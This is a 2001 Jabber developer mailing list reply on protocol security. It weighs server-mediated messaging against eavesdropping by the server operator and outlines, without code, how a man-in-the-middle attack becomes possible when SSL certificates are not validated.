[JDEV] RE: File Transfer [was buddy icons]

kadokev at msg.net kadokev at msg.net
Tue Apr 10 09:45:21 CDT 2001

> One thing though, once the conversation has been snooped on, isn't the
> security already totally compromised?
It's a reasomable goal for any system to ensure that passive traffic sniffing
does not compromise the security, As was mentioned earlier, SSL, PGP, and
0K authentication can help assist in reaching this goal.

One design 'feature' that I like about Jabber is that all communication
is user-to-server and not directly user-to-user. This protects the client
from DOS attacks against your IP address (As is common on IRC) because your
IP address is never revealed to the client.

Unfortunately, this design means that a malicious server operator can very
easily sniff, log, and even modify all communications to and from any user
logged in to that server. Even with PGP you still have traffic analysis, etc.

For example, without SSL (and without SSL certificate validation) I can create
a MITM attack, a XML forwarder that looks like your favorite Jabber server,
but actually logs/modifies all traffic, or even translates everything you
say into pig latin. I was hoping to release my proof of concept for this on
April 1st...

I suggest that we take this to the 'security' Jabber mailing list.

Kevin Kadow
MSG.Net, Inc.

More information about the JDev mailing list